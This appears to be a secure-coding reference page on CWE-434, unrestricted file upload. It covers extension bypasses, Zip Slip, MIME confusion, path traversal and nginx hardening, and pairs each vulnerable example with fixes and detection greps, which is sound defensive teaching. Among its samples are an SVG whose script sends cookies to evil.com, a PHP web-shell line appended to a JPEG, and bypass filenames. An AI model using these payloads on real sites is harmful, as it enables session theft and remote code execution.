CWE-434: Unrestricted Upload of Dangerous File Type¶
CWE Top 25 Rank: 10 (2024). Impact range: RCE (upload PHP/JSP shell), Stored XSS (upload SVG/HTML), Path traversal (overwrite config files), DoS (upload ZIP bomb, infinite loop scripts). Core issue: The server accepts and stores files that the server or clients will subsequently execute or render in a privileged context.
Functional Semantics¶
The vulnerability manifests in two distinct execution contexts:
- Server-side execution: uploaded file is placed in a directory served by an application runtime (PHP, Python, Node.js, JSP/Servlet), allowing the attacker to request the file and have the server execute it.
- Client-side execution: uploaded file is served to other users with a MIME type that causes the browser to execute it (SVG with embedded JS, HTML files, XML with XSLT).
Secondary impact without execution: path traversal in filename allows overwriting arbitrary files on the server; ZIP/archive bombs cause resource exhaustion.
Extension Bypass Techniques¶
Double extension¶
shell.php.jpg # Apache with misconfigured AddHandler will execute as PHP
shell.php%00.jpg # Null byte truncation in older PHP: stored as shell.php
shell.pHp # Case-insensitive file system + case-insensitive extension check
shell.php5 # Alternative PHP extension not in blocklist
shell.phtml # Another PHP alternative extension
shell.shtml # Apache SSI - Server Side Includes execution
Incomplete blocklists (common mistakes):
# VULNERABLE: blocklist approach, incomplete
BLOCKED_EXTENSIONS = {'.php', '.asp', '.aspx', '.py', '.rb'}
def validate_upload(filename):
ext = os.path.splitext(filename)[1].lower()
if ext in BLOCKED_EXTENSIONS:
raise ValueError("Dangerous file type")
# Misses: .php5, .phtml, .shtml, .cgi, .pl, .jsp, .jspx, .cfm, etc.
# FIXED: allowlist approach - only permit explicitly safe types
ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.webp', '.pdf', '.mp4'}
def validate_upload(filename):
# Use pathlib to handle complex extension cases
ext = pathlib.Path(filename).suffix.lower()
if ext not in ALLOWED_EXTENSIONS:
raise ValueError(f"File type not permitted: {ext}")
Null byte injection (legacy PHP/older systems)¶
# HTTP multipart body:
Content-Disposition: form-data; name="file"; filename="shell.php%00.jpg"
# PHP < 5.3.4: null byte truncates the string → stored as shell.php
# Modern PHP: fixed, but may exist in custom C extensions
Archive extraction path traversal (Zip Slip)¶
# VULNERABLE: extracting ZIP without path validation
import zipfile
def extract_upload(zip_path, dest_dir):
with zipfile.ZipFile(zip_path) as zf:
zf.extractall(dest_dir) # archive may contain ../../etc/cron.d/evil
# FIXED: validate each member path stays within dest_dir
import zipfile, pathlib
def safe_extract(zip_path, dest_dir):
dest = pathlib.Path(dest_dir).resolve()
with zipfile.ZipFile(zip_path) as zf:
for member in zf.namelist():
member_path = (dest / member).resolve()
if not str(member_path).startswith(str(dest)):
raise ValueError(f"Path traversal attempt: {member}")
zf.extract(member, dest_dir)
MIME Type Confusion¶
Client-supplied Content-Type (never trust)¶
# VULNERABLE: trusting browser-provided Content-Type
def handle_upload(request):
content_type = request.FILES['file'].content_type # from HTTP header, attacker-controlled
if content_type.startswith('image/'):
save_file(request.FILES['file']) # attacker sends PHP shell with Content-Type: image/jpeg
# FIXED: detect MIME from file content (magic bytes), not headers
import magic # python-magic library
def handle_upload(request):
uploaded = request.FILES['file']
file_bytes = uploaded.read(2048)
uploaded.seek(0)
detected_mime = magic.from_buffer(file_bytes, mime=True)
if detected_mime not in ALLOWED_MIME_TYPES:
raise ValueError(f"Detected type {detected_mime} not allowed")
save_file(uploaded)
Magic bytes for common types:
| Type | First bytes |
|---|---|
| JPEG | FF D8 FF |
| PNG | 89 50 4E 47 0D 0A 1A 0A |
| GIF | 47 49 46 38 (GIF8) |
25 50 44 46 (%PDF) | |
| ZIP | 50 4B 03 04 |
| PHP | 3C 3F 70 68 (<?ph) - always reject this magic in image uploads |
SVG with Embedded JavaScript (Stored XSS)¶
SVG is XML and can contain <script> tags. When served as image/svg+xml, browsers execute the JavaScript in the page's origin context.
<!-- ATTACK: uploaded as avatar.svg -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>
// Executes in the origin of the site serving this SVG
document.cookie // accessible
fetch('https://evil.com/steal?c=' + document.cookie)
</script>
<rect width="100" height="100"/>
</svg>
Fix options:
# Option 1: reject SVG entirely if user-generated content
ALLOWED_IMAGE_TYPES = {'image/jpeg', 'image/png', 'image/gif', 'image/webp'}
# image/svg+xml NOT in this set
# Option 2: if SVG needed, sanitize with bleach/DOMPurify on the server
import bleach
def sanitize_svg(svg_content: str) -> str:
# Allow structural SVG tags, disallow script/foreignObject/use href tricks
allowed_tags = {'svg', 'path', 'circle', 'rect', 'line', 'g', 'text', 'defs'}
allowed_attrs = {'viewBox', 'width', 'height', 'd', 'fill', 'stroke', 'cx', 'cy', 'r'}
return bleach.clean(svg_content, tags=allowed_tags, attributes=allowed_attrs, strip=True)
# Option 3: serve SVG with Content-Disposition: attachment (no execution in browser)
# and Content-Type: application/octet-stream
Polyglot Files¶
A file that is simultaneously valid in two formats. Example: a valid JPEG that is also a valid PHP script.
# JPEG header
FF D8 FF E0 ... [valid JPEG data]
# After JPEG data, PHP code appended (JPEG parser ignores trailing data)
<?php system($_GET['cmd']); ?>
The JPEG renders correctly in an image viewer. If served via PHP with certain eval patterns or included via include, the PHP interpreter executes it.
Defense: Image reprocessing (re-encode all uploaded images):
from PIL import Image
import io
def sanitize_image_upload(file_bytes: bytes) -> bytes:
"""Re-encode image to strip appended code and EXIF payloads."""
img = Image.open(io.BytesIO(file_bytes))
img.verify() # raises if not valid image
# Re-open (verify() leaves the file at end of stream)
img = Image.open(io.BytesIO(file_bytes))
output = io.BytesIO()
# Re-encode: strips EXIF, appended PHP, embedded JS in metadata
img.save(output, format=img.format or 'JPEG', exif=b'')
return output.getvalue()
Path Traversal in Filename¶
# VULNERABLE: using user-supplied filename directly
def save_upload(filename, data):
path = os.path.join('/var/uploads', filename)
# filename = '../../etc/cron.d/evil' → writes to /etc/cron.d/evil
with open(path, 'wb') as f:
f.write(data)
# FIXED: use only the basename, generate server-side name
import uuid, pathlib
def save_upload(filename: str, data: bytes) -> str:
# Extract only the base filename, discard any directory components
safe_name = pathlib.Path(filename).name # strips ../../ prefixes
ext = pathlib.Path(safe_name).suffix.lower()
# Better: generate a new UUID-based name entirely (avoids name conflicts + traversal)
stored_name = f"{uuid.uuid4()}{ext}"
dest = pathlib.Path('/var/uploads') / stored_name
# Paranoid check: verify final path is within uploads dir
if not str(dest.resolve()).startswith('/var/uploads'):
raise ValueError("Path traversal detected")
dest.write_bytes(data)
return stored_name
Upload to Webroot / Execution Context¶
A file that would be safe as a download becomes dangerous when placed in a directory served by the application runtime.
# VULNERABLE nginx + php-fpm config
location /uploads/ {
# Files served from here
}
location ~ \.php$ {
fastcgi_pass php-fpm;
# If upload dir overlaps with PHP-served dir, uploaded .php files execute
}
# FIXED: explicitly disable execution in uploads directory
location /uploads/ {
add_header Content-Disposition "attachment";
location ~ \.(php|phtml|php5|shtml|cgi|pl|jsp)$ {
deny all; # block execution even if misconfigured
}
}
Principle: uploaded files must never be stored inside or below the application's code/template root. Serve from a separate origin (static.example.com) or object storage (S3, GCS) with no execution capability.
Affected Ecosystems¶
| Ecosystem | Specific risks | Notes |
|---|---|---|
| PHP | .php, .phtml, .php5 execution | Most critical; PHP includes from file path are RCE |
| Python/Django | Indirect (no direct file execution); SVG XSS | Static files served differently; Django doesn't exec uploads |
| Java/JSP | .jsp, .jspx execution if in webapp root | Upload to WEB-INF/ can bypass; upload outside webroot is safe |
| Node.js | No file execution from disk by default; require() injection possible | SVG XSS via res.sendFile with wrong Content-Type |
| Ruby on Rails | CarrierWave/Paperclip misconfigs; SVG XSS | Content-Type from filename extension: check for .svg |
| ASP.NET | .aspx, .ashx execution if in IIS-served dir | IIS serves .aspx from anywhere in webroot |
| Go | No built-in file execution; SVG XSS via http.ServeFile | Custom exec via os/exec with uploaded filename possible |
Detection Heuristics¶
- Find file upload handlers: search for
multipart/form-data,request.FILES,UploadedFile,MultipartFile,IFormFile,upload.single(). - For each handler, check: is there an extension allowlist (not blocklist)? Is there MIME validation using magic bytes (not
Content-Typeheader)? - Check where uploaded files are stored: is the path inside the webroot? Is the directory served with execute permissions?
- Check if the stored filename derives from user input:
filenamefield inContent-Disposition. Any path component from user input withoutbasename()is path traversal. - For image uploads: is there image reprocessing (Pillow, ImageMagick
convert)? No reprocessing = polyglot / metadata payload risk. - Check served
Content-Type: are uploaded files served with the correct type, or does the server guess from extension?
# Grep patterns
grep -rn "request.FILES\|multipart\|upload" --include="*.py" -l
grep -rn "\.filename\|getOriginalFilename\|getClientFilename" --include="*.java" -l
grep -rn "req\.file\|multer\|busboy" --include="*.js" -l
grep -rn "IFormFile\|HttpPostedFileBase" --include="*.cs" -l
Fixing Patterns¶
| Control | Implementation |
|---|---|
| Extension allowlist | ALLOWED_EXT = {'.jpg', '.png', '.pdf'}; if ext not in ALLOWED_EXT: reject |
| MIME from magic bytes | python-magic, file-type (npm), net/http.DetectContentType (Go) |
| Store outside webroot | Upload to /var/uploads/ (not in /var/www/) or object storage |
| Separate static origin | Serve user uploads from uploads.example.com - different origin prevents cookie theft |
| UUID filenames | stored_as = str(uuid4()) + ext - prevents path traversal and name guessing |
| Image reprocessing | PIL.Image.open() → img.save() strips appended code and EXIF |
| Content-Disposition header | Content-Disposition: attachment forces download instead of render |
| Antivirus scanning | ClamAV on uploaded files - catches known malware, not custom shells |
| File size limit | Prevent ZIP bombs; MAX_UPLOAD_SIZE = 10 * 1024 * 1024 |
Gotchas - False Positive Indicators¶
- Admin-only upload endpoints with no external user access: lower risk profile, but admin account compromise still exploitable; not a zero-risk finding.
- Upload to object storage (S3/GCS) with
NoExecutepolicy: files stored in S3 cannot be executed server-side; SVG XSS remains possible if served directly from S3 withoutContent-Disposition: attachment. Content-Type: image/jpegvalidation via header from browser: not a fix, it's client-supplied. It matters only if validation usesmagic.from_buffer().os.path.basename()on Windows paths on Linux:os.path.basename('C:\\..\\evil.php')on Linux returnsC:\\..\\evil.php(not just the filename). Usepathlib.Path(filename).namewhich handles both separators.- Image libraries that tolerate corrupted headers: PIL
Image.open()raises on truly invalid files but accepts many polyglots.img.verify()+ re-open + re-save is the reliable pattern.
See Also¶
- CWE-22: Path Traversal - path traversal in filename component
- CWE-79: Xss - consequence via SVG/HTML upload
- CWE-352: Csrf - often combined with file upload to force victim's upload
- CWE-732: Insecure Permissions - upload dir permissions enabling execution
- web application security fundamentals - broader web security context